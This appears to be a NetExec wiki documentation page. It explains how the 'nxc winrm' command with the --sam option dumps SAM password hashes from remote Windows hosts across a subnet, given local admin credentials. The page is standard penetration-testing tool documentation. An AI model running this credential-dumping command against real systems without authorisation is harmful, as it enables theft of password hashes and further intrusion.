> For the complete documentation index, see [llms.txt](https://www.netexec.wiki/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://www.netexec.wiki/winrm-protocol/obtaining-credentials/dump-sam.md).

# Dump SAM

### Dump SAM hashes

Extracts and downloads SAM registry hive, and uses secretsdump.py methods locally to dump hashes

{% hint style="warning" %}
You need at least local admin privilege on the remote target, use option **--local-auth** if your user is a local account
{% endhint %}

```bash
nxc winrm 192.168.1.0/24 -u UserName -p 'PASSWORDHERE' --sam
```
